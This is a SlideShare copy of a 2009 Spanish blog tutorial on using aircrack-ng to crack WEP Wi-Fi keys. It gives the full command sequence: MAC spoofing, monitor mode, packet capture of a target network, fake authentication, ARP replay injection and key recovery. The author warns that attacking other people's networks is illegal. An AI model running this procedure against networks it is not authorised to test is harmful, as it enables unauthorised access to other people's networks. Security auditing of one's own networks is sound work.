SlideShare una empresa de Scribd logo
1 de 4
Aircrack-ng: Comandos básicos
Posted: marzo 11, 2009 in General, GNU/Linux, Manuales/How-To, Seguridad
Etiquetas: Aircrack, Aireplay, Airodump, ataque redes, crack WEP, GNU/Linux, WEP, wep vulnerable, WPA, WPA2-PSK
9




                                                  Aircrack-ng es una suite de programas para la auditoría
de redes inalámbricas.
¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenas
con el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas.
Esta acción es ILEGAL.
Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles
de descifrar y por error para el usuario de una conexión la más común.


Por ello es recomendable no usar encriptación WEP al ser
fácilmente vulnerable.
Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
¿Qué necesito para usar Aircrack-ng?.
Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de
compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red
atacada para poder descifrar la clave.
Los programas en cuestión que trae Aircrack-ng así como macchanger.
¿Qué es recomendado tener para usar Aircrack-ng?
Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad).
Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red y
por tanto capturaremos más paquetes en mucho menos tiempo.
Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos
poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar
que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y
utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB,
ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB
e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax,
WifiWay…
¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB?
Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas.
Aircrack-ng Downloads
En Ubuntu, que es la distribución que uso yo:
     sudo apt-get install aircrack-ng

Para instalar Macchanger, puedes pasarte por su web
Macchanger Downloads
En Ubuntu:
     sudo apt-get install macchanger

Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os
voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con
clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL.
Prueba con tu red y verás que fácil es de vulnerar.
Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org.
Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios.
Este comando varía según la distribución GNU/Linux que usemos.
     sudo su

*** Preparación de la tarjeta
     airmon-ng

>>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0,
wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500.
     airmon-ng stop ra0

>>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado.
     ifconfig ra0 down

>>tarjeta de red desactiva: no sale nada por pantalla.
     macchanger –mac 00:11:22:33:44:55 ra0

>>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa
que hemos nos hemos asignado para luego poder inyectar paquetes.
     airmon-ng start ra0
>>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar
paquetes)
*** Escaneo de redes y clientes asociados
     airodump-ng ra0

>>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información
como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a
las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR)
apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando
“Control+C”, o cerrando y abriendo otra terminal.
     airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0

Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng
-c 11 -w capturaswifi – - bssid 00:01:02:03:04:C1
>>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los
clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA
CIERRES!!!
*** Inyección de paquetes para agilizar el proceso de capturas de paquetes
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
     aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0

>>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el
comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el
nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association
Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a
00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0.
     aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0

>>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la
inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b
00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto
NO CIERRES ESTA TERMINAL!!!
*** Crackeo WEP
Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de
paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a
intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas.
Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos
más de 25.000 #data recogidos.
Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes.
     aircrack-ng –b BSSID ArchivoDeCapturas.cap

>>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos,
y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo
volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la
clave en hexadecimal normalmente.

Más contenido relacionado

La actualidad más candente

Dispositivos de interconexion
Dispositivos de interconexionDispositivos de interconexion
Dispositivos de interconexionJaydiver23
 
Unidad no. 2 búsqueda en espacio de estados
Unidad no. 2   búsqueda en espacio de estadosUnidad no. 2   búsqueda en espacio de estados
Unidad no. 2 búsqueda en espacio de estadosMilton Klapp
 
Arquitecturas RISC - CISC
Arquitecturas RISC - CISCArquitecturas RISC - CISC
Arquitecturas RISC - CISCEdwin Belduma
 
Maquinas virtuales
Maquinas virtualesMaquinas virtuales
Maquinas virtualesisma2013
 
Colisiones dominios de colisión y segmentación
Colisiones dominios de colisión y segmentaciónColisiones dominios de colisión y segmentación
Colisiones dominios de colisión y segmentaciónBetty Ayllon
 
Caracteristicas importantes de Centos
Caracteristicas importantes de CentosCaracteristicas importantes de Centos
Caracteristicas importantes de Centosjulyuladech
 
Proyecto: Monitorización de red con SNMP y MRTG
Proyecto: Monitorización de red con SNMP y MRTGProyecto: Monitorización de red con SNMP y MRTG
Proyecto: Monitorización de red con SNMP y MRTGFrancesc Perez
 
Control de flujo en Telecomunicaciones
Control de flujo en TelecomunicacionesControl de flujo en Telecomunicaciones
Control de flujo en TelecomunicacionesDaniel Morales
 
Instalacion de programas
Instalacion de programasInstalacion de programas
Instalacion de programasLuxed Tevic
 
Problemas de desempeño en las redes de cómputo
Problemas de desempeño en las redes de cómputoProblemas de desempeño en las redes de cómputo
Problemas de desempeño en las redes de cómputopabloanibaltabango
 
Esquema sistemas informaticos
Esquema sistemas informaticosEsquema sistemas informaticos
Esquema sistemas informaticosBrian Ruvalcaba
 

La actualidad más candente (20)

B. manejo de concurrencia
B.  manejo de concurrenciaB.  manejo de concurrencia
B. manejo de concurrencia
 
Dispositivos de interconexion
Dispositivos de interconexionDispositivos de interconexion
Dispositivos de interconexion
 
Unidad no. 2 búsqueda en espacio de estados
Unidad no. 2   búsqueda en espacio de estadosUnidad no. 2   búsqueda en espacio de estados
Unidad no. 2 búsqueda en espacio de estados
 
Gestion de redes
Gestion de redesGestion de redes
Gestion de redes
 
Arquitecturas RISC - CISC
Arquitecturas RISC - CISCArquitecturas RISC - CISC
Arquitecturas RISC - CISC
 
Maquinas virtuales
Maquinas virtualesMaquinas virtuales
Maquinas virtuales
 
Colisiones dominios de colisión y segmentación
Colisiones dominios de colisión y segmentaciónColisiones dominios de colisión y segmentación
Colisiones dominios de colisión y segmentación
 
Caracteristicas importantes de Centos
Caracteristicas importantes de CentosCaracteristicas importantes de Centos
Caracteristicas importantes de Centos
 
Proyecto: Monitorización de red con SNMP y MRTG
Proyecto: Monitorización de red con SNMP y MRTGProyecto: Monitorización de red con SNMP y MRTG
Proyecto: Monitorización de red con SNMP y MRTG
 
Control de flujo en Telecomunicaciones
Control de flujo en TelecomunicacionesControl de flujo en Telecomunicaciones
Control de flujo en Telecomunicaciones
 
ADMINISTRACION DE MEMORIA
ADMINISTRACION DE MEMORIAADMINISTRACION DE MEMORIA
ADMINISTRACION DE MEMORIA
 
El mundo de Wumpus
El mundo de WumpusEl mundo de Wumpus
El mundo de Wumpus
 
Fcaps
FcapsFcaps
Fcaps
 
Instalacion de programas
Instalacion de programasInstalacion de programas
Instalacion de programas
 
Arquitectura harvard
Arquitectura harvardArquitectura harvard
Arquitectura harvard
 
LA CPU ALU y UC
LA CPU ALU y UCLA CPU ALU y UC
LA CPU ALU y UC
 
Problemas de desempeño en las redes de cómputo
Problemas de desempeño en las redes de cómputoProblemas de desempeño en las redes de cómputo
Problemas de desempeño en las redes de cómputo
 
Esquema sistemas informaticos
Esquema sistemas informaticosEsquema sistemas informaticos
Esquema sistemas informaticos
 
Enrutamiento dinamico
Enrutamiento dinamicoEnrutamiento dinamico
Enrutamiento dinamico
 
Gestion de Entrada y Salida
Gestion de Entrada y SalidaGestion de Entrada y Salida
Gestion de Entrada y Salida
 

Similar a Aircrack ng: comandos básicos

Similar a Aircrack ng: comandos básicos (20)

Crack redes wifi
Crack redes wifiCrack redes wifi
Crack redes wifi
 
Funcionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislaxFuncionamiento básico y primeros pasos en wifislax
Funcionamiento básico y primeros pasos en wifislax
 
Qué es wep
Qué es wepQué es wep
Qué es wep
 
Backtrack 3 manual
Backtrack 3 manualBacktrack 3 manual
Backtrack 3 manual
 
Cracking wep con kali linux
Cracking wep con kali linuxCracking wep con kali linux
Cracking wep con kali linux
 
Auditoria En Wireless
Auditoria En WirelessAuditoria En Wireless
Auditoria En Wireless
 
Backtrack 3
Backtrack 3Backtrack 3
Backtrack 3
 
Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))Testing Redes Inalambricas wifiway (Definiciones))
Testing Redes Inalambricas wifiway (Definiciones))
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Wep wpa wpa2-cracking
Wep wpa wpa2-crackingWep wpa wpa2-cracking
Wep wpa wpa2-cracking
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Backtrack 5
Backtrack 5Backtrack 5
Backtrack 5
 
Flisol Airacrack-ng
Flisol Airacrack-ng Flisol Airacrack-ng
Flisol Airacrack-ng
 
Workshop Seguridad Wireless
Workshop Seguridad WirelessWorkshop Seguridad Wireless
Workshop Seguridad Wireless
 
Como usar Aircrack
Como usar AircrackComo usar Aircrack
Como usar Aircrack
 
Airodump
AirodumpAirodump
Airodump
 
Bactrack4
Bactrack4Bactrack4
Bactrack4
 
Bactrack4
Bactrack4Bactrack4
Bactrack4
 
Crackeando redes wep
Crackeando redes wepCrackeando redes wep
Crackeando redes wep
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 

Aircrack ng: comandos básicos

  • 1. Aircrack-ng: Comandos básicos Posted: marzo 11, 2009 in General, GNU/Linux, Manuales/How-To, Seguridad Etiquetas: Aircrack, Aireplay, Airodump, ataque redes, crack WEP, GNU/Linux, WEP, wep vulnerable, WPA, WPA2-PSK 9 Aircrack-ng es una suite de programas para la auditoría de redes inalámbricas. ¿Para qué es utilizado?. Sin duda ha logrado su éxito para realizar ataques a redes inalámbricas ajenas con el objetivo de obtener la contraseña del router para poder acceder a internet entre otras cosas. Esta acción es ILEGAL. Es posible obtener las claves cifradas WEP y WPA/WPA2-PSK siendo las claves WEP las más fáciles de descifrar y por error para el usuario de una conexión la más común. Por ello es recomendable no usar encriptación WEP al ser fácilmente vulnerable. Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org. ¿Qué necesito para usar Aircrack-ng?. Es necesario tener una tarjeta de red inalámbrica compatible con airodump-ng (ver lista de compatibilidad). Airodump-ng es el programa con el que se capturan los paquetes cifrados de la red atacada para poder descifrar la clave. Los programas en cuestión que trae Aircrack-ng así como macchanger. ¿Qué es recomendado tener para usar Aircrack-ng? Es recomendable que nuestra tarjeta sea compatible con Aireplay-ng (ver lista de compatibilidad). Aireplay-ng es el programa de inyección de paquetes. Éste programa generará más tráfico en la red y por tanto capturaremos más paquetes en mucho menos tiempo. Debido a que Aireplay-ng solo es compatible con el sistema operativo GNU/Linux, si queremos poder inyectar paquetes es necesario que usemos alguna distribución GNU/Linux. Hay que mencionar
  • 2. que hay distribuciones específicas que contienen ya Aircrack-ng así como más programas y utilidades y driver parcheados para inyectar paquetes. Tales distribuciones son Live CD o Live USB, ésto significa que no es necesario instalarlos en nuestra máquina, basta con grabarlos en un CD o USB e iniciar la máquina arrancando desde ellos. Algunas de estas distribuciones son: Backtrack, WifiSlax, WifiWay… ¿Cómo me instalo Aircrack-ng y Macchanger si no quiero usar Live CD o Live USB? Si optas por instalar Aircrack-ng en tu Sistema Operativo puedes pasarte por su web de descargas. Aircrack-ng Downloads En Ubuntu, que es la distribución que uso yo: sudo apt-get install aircrack-ng Para instalar Macchanger, puedes pasarte por su web Macchanger Downloads En Ubuntu: sudo apt-get install macchanger Ya que tenemos todo preparado: Tarjeta compatible con airodump-ng y aireplay-ng y macchanger, os voy a dejar unos comando básicos para hacer un ataque a una red con encriptacion WEP con clientes asociados. Ten en cuenta que hacer este proceso a una red ajena a la propia es ILEGAL. Prueba con tu red y verás que fácil es de vulnerar. Todos los comandos e información está sacada de la web oficial de Aircrack-ng.org. Primero abrimos una terminal (consola) y entramos como superusuario(root) para tener privilegios. Este comando varía según la distribución GNU/Linux que usemos. sudo su *** Preparación de la tarjeta airmon-ng >>interfaz inalámbrico: nos devuelve por pantalla el nombre de la tarjeta red que tenemos (wifi0, wlan0, ath0, ra0,…). Yo usaré ra0 por tener una ralink 2500. airmon-ng stop ra0 >>monitor mode disable: nos devuelve que nuestra tarjeta tiene el modo monitor desactivado. ifconfig ra0 down >>tarjeta de red desactiva: no sale nada por pantalla. macchanger –mac 00:11:22:33:44:55 ra0 >>Current mac: xx:xx:xx:xx:xx:xx Fake mac:00:11:22:33:44:55: nos da la mac original y la falsa que hemos nos hemos asignado para luego poder inyectar paquetes. airmon-ng start ra0
  • 3. >>monitor mode enable: Ponemos nuestra tarjeta en modo monitor(necesario para poder capturar paquetes) *** Escaneo de redes y clientes asociados airodump-ng ra0 >>redes y clientes disponibles: nos sale una tabla con las redes disponibles con toda la información como canal, nombre, calidad de señal, tipo de encriptación, etc.. y los clientes que están conectadas a las redes. Así que elegimos una que tenga buena señal (que vaya capturando #data y tenga buen PWR) apuntamos la BSSID, el numero de canal (CHANNEL). Paramos la ejecución del comando pulsando “Control+C”, o cerrando y abriendo otra terminal. airodump-ng –c NumeroDeCanal –w ArchivoDeCapturas –bssid BBSID ra0 Por ejemplo una red en canal 11 con BSSID 00:01:02:03:04:C1 que hemos detectado: airodump-ng -c 11 -w capturaswifi – - bssid 00:01:02:03:04:C1 >>Capturando paquetes…: nos va saliendo la captura de paquetes así como la señal de la red y los clientes asociados. Dejamos recogiendo paquetes, por lo que ESTA TERMINAL NO LA CIERRES!!! *** Inyección de paquetes para agilizar el proceso de capturas de paquetes Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aireplay-ng -1 0 –a BSSID –h 00:11:22:33:44:55 –e ESSID ra0 >>Association successful: Con esto hacemos una autenticación falsa en el router. Para ello en el comando se necesita la BSSID de la red atacada, la mac falsa que nos pusimos (00:11:22:33:44:55) y el nombre que tiene la red atacada, es decir, la ESSID. Es importante que nos salga el Association Succesful, de lo contrario no podremos inyectar paquetes. Por ejemplo: aireplay-ng 1 0 -a 00:01:02:03:04:05 -h 00:11:22:33:44:55 -e WIFI_RED ra0. aireplay-ng -3 –b BSID –h 00:11:22:33:44:55 ra0 >>Envío de paquetes…: nos saldrá por pantalla que se están mandando paquetes, para que la inyección sea correcta deben aparecer paquetes ARP recogidos. Por ejemplo: aireplay-ng -3 -b 00:01:02:03:04:05 -h 00:11:22:33:44:55 ra0. Ahora dejamos que siga inyectando paquetes, por tanto NO CIERRES ESTA TERMINAL!!! *** Crackeo WEP Para poder obtener la clave WEP es necesario tener un mínimo de paquetes recogidos. El número de paquetes dependerá de la longitud que tenga la clave WEP. Como mínimo recomiendo que empecéis a intentar conseguir la clave a partir de 25.000 por si la clave es de las cortas. Cuando veamos en la terminal que dejamos el airodump-ng recogiendo paquetes que tenemos más de 25.000 #data recogidos. Abre una nueva terminal (consola) con privilegios de superusuario(root) como antes. aircrack-ng –b BSSID ArchivoDeCapturas.cap >>Clave WEP encontrada/no encontrada: El programa empezará a descifrar los paquetes recogidos, y cuando finalice nos dirá si ha encontrado la clave o no. Si no la encuentra nos recomienda que lo
  • 4. volvamos a intentar superados “X” paquetes recogidos. Si la encuentra nos saldrá: KEY FOUND! y la clave en hexadecimal normalmente.